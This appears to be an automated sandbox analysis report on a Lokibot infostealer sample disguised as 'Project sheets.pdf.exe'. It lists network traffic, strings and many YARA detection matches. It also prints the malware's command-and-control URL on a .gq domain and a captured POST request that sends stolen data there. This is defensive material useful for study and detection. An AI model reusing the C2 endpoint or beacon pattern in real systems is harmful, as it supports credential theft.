                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Aug 2022 04:43:54 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=En0ibOgeEuMxY2mpHD2Dt3TdC47cwr0p%2B%2FkxieOBFGmpgV0W8IYvn3FdaUu5Dw3eYi89xBOfLEzFvGaVkysT4VQaqP1FJy4AkZCJvdsml9EBR6cH68soksbWjOz2PA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 738e50209b4692a5-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Aug 2022 04:43:55 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fRCqN%2B0U%2FIaJlKXxZ0j9RFyfBV2nGu%2Bs3z%2FsZN0sUZyIfeketjJylXcTToil1dlVsJcfYulWZ7AN3gENYb6%2FnTXhsn7WqZfUwLPIOGO3aDtBG%2FjPde0X6n6l2WwZjg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 738e50272bba9060-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Aug 2022 04:43:58 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PSagRcg%2BXgMM8SLs1fz1sWSt3bmnwStUi%2B9W77wP9McJbCEncWHNRPxRcBP2MEeo4%2BG9DAV%2FyOHi%2Fg70bNZbQEebuoYORKyhvSDwkCg7bgb%2B5KBhVvZvlLt%2BS3qCOw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 738e503a0f0c9b1f-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Aug 2022 04:44:00 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gCIohsXjHhgi0pQExP2v8aaRoEpTkgH8DUsDtSscarAKN6sCn7smeeWy9hlvBjh8%2BS%2BX1zapu%2B5%2BOZP8efkqrsyWJ3QvXrzyY9TiWrZ%2Fxe%2BhhcbnerbQyw2nP%2BtpFA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 738e5044da06bba7-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Aug 2022 04:44:01 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pqVP65brrqjsnWByoTI7h%2Beihew4kemEjFaRp39wYal1iwPuhR1mCslnHhL%2BGO7wotp5gPYsoPk9QiiY2rKGIlyolfTNGFDDREhFvp96JrTmCIzOCv6%2Bf2d%2BAnEuOQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 738e504f0ca29140-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Aug 2022 04:44:03 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UWOk8nrhWsKBKGWXSePgv8dtkyveOyzmxWIMZzvZ8izB2dT7YQLIajfAbJ7oAJ3TKxuCqWiHVj0DQF4T24Rpb8OGZKiBf8VDNmp0wuRdyBsttE%2FFj7le1FIprpYRXw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 738e5059ae8c9018-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Aug 2022 04:44:05 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KlaIcUFq%2FAKMZr8cKuA7oS9%2F0E%2FRgGaKflZWBKkiJ9ilDyY1Sft%2FkwrTIkWCTxABLWGIMhtPPWfpGj4bz8E23nuql8Rm%2Bdzkjxh4tE3Ibkx0blidQFfJSr%2FOC%2F23lg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 738e5062ceb69128-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Aug 2022 04:44:06 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4dWgjRH38pyPZeD0qb0jk1%2F9qOz8xFjDAiF5Gi2i2AeNn31igXE4WwQOWYQHrpOyIGITs3%2Fzw1da6XTCKPX3NE8Mjee42nTkPpxBuY5u2IZKUgW5M0nLaa1piuJcXw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 738e506a89e19271-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Aug 2022 04:44:07 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NwDeet%2BtDovGzYKRHtlc%2BIy9CvtPPAj%2FIhJEPstX1Ci1BEnwzlCsGh%2BuTY0Brr6ZBfTS8J8wHhv9vdUzelvtptMWlvXbpzGKUv3k3lh%2FjuysDwLv3KXOt2JS1GaA8w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 738e5074b917bb5b-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Aug 2022 04:44:08 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=c0pX9SJrHopzRCsEkDmDxwlNx0C41KoS8krJ5OgxEsOqET4277iXRW3J%2FWp2JHcXROzAxWooOe8cWiTJpbpDaNfjHGikivIw5A1OpyJxaquuggPEYvGU5TP02bgBIg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 738e507b3f7b91d8-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Aug 2022 04:44:10 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=A8uhSCBmIXKRlfuG%2F6EDgs3Nh9LOjKk3NdY%2BN9yfSiF3S03bDoGetakChdva7ldiD%2BvTJDuSTvIs7znKB4Lzu7%2BAAco8%2BiNoqOwzPZxCDqD3J%2FLSBTi0p%2Fy1e7TDzw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 738e5081f8b99b98-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: Project sheets.pdf.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
                Source: Project sheets.pdf.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                Source: Project sheets.pdf.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
                Source: Project sheets.pdf.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
                Source: Project sheets.pdf.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                Source: Project sheets.pdf.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceCodeSigningCA.crt0
                Source: Project sheets.pdf.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
                Source: Project sheets.pdf.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
                Source: Project sheets.pdf.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                Source: Project sheets.pdf.exeString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                Source: Project sheets.pdf.exeString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0O
                Source: Project sheets.pdf.exeString found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
                Source: Project sheets.pdf.exeString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                Source: Project sheets.pdf.exeString found in binary or memory: http://crl3.digicert.com/sha2-ha-cs-g1.crl00
                Source: Project sheets.pdf.exeString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
                Source: Project sheets.pdf.exeString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
                Source: Project sheets.pdf.exeString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                Source: Project sheets.pdf.exeString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                Source: Project sheets.pdf.exeString found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
                Source: Project sheets.pdf.exeString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                Source: Project sheets.pdf.exeString found in binary or memory: http://crl4.digicert.com/sha2-ha-cs-g1.crl0L
                Source: Project sheets.pdf.exeString found in binary or memory: http://ocsp.digicert.com0A
                Source: Project sheets.pdf.exeString found in binary or memory: http://ocsp.digicert.com0C
                Source: Project sheets.pdf.exeString found in binary or memory: http://ocsp.digicert.com0I
                Source: Project sheets.pdf.exeString found in binary or memory: http://ocsp.digicert.com0O
                Source: Project sheets.pdf.exeString found in binary or memory: http://ocsp.digicert.com0P
                Source: Project sheets.pdf.exeString found in binary or memory: http://ocsp.digicert.com0R
                Source: Project sheets.pdf.exeString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                Source: cvtres.exe, cvtres.exe, 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, cvtres.exe, 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
                Source: cvtres.exe, 00000003.00000002.500737023.000000000049F000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://tixfilmz.gq/Devil/PWS/fre.php
                Source: Project sheets.pdf.exeString found in binary or memory: https://www.digicert.com/CPS0
                Source: unknownHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 190Connection: close
                Source: unknownDNS traffic detected: queries for: tixfilmz.gq
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_00404ED4 recv,
                Source: Project sheets.pdf.exe, 00000000.00000002.245726973.0000000001528000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                System Summary

                barindex
                Source: 3.0.cvtres.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 3.0.cvtres.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 3.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 3.0.cvtres.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 3.0.cvtres.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 3.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 3.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 3.0.cvtres.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 3.0.cvtres.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 3.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 3.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 3.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 3.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 3.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 3.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 3.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 3.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 3.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 3.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 3.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 3.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 3.0.cvtres.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 3.0.cvtres.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 3.0.cvtres.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 3.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 3.0.cvtres.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 3.0.cvtres.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 3.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 3.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 3.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 3.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 3.2.cvtres.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 3.2.cvtres.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 3.2.cvtres.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 3.2.cvtres.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 3.2.cvtres.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 3.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 3.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 3.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 3.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 3.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 3.0.cvtres.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 3.0.cvtres.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 3.0.cvtres.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 3.0.cvtres.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 3.0.cvtres.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0.2.Project sheets.pdf.exe.41d5530.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 0.2.Project sheets.pdf.exe.41d5530.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 0.2.Project sheets.pdf.exe.41d5530.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 3.0.cvtres.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 0.2.Project sheets.pdf.exe.41d5530.5.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 0.2.Project sheets.pdf.exe.41d5530.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0.2.Project sheets.pdf.exe.41d5530.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 0.2.Project sheets.pdf.exe.41d5530.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 3.0.cvtres.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 3.0.cvtres.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 0.2.Project sheets.pdf.exe.41d5530.5.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 3.0.cvtres.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 3.0.cvtres.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0.2.Project sheets.pdf.exe.41d5530.5.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 3.0.cvtres.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 3.0.cvtres.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 3.0.cvtres.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 3.0.cvtres.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 3.0.cvtres.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 3.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 3.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 3.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 3.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 3.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000003.00000000.243627091.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000000.00000002.246158939.0000000003200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000000.00000002.246158939.0000000003200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000000.00000002.246158939.0000000003200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000000.00000002.246208717.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000000.00000002.246208717.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000000.00000002.246208717.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000003.00000000.244125189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 00000003.00000000.244125189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000003.00000000.244125189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000003.00000000.244125189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
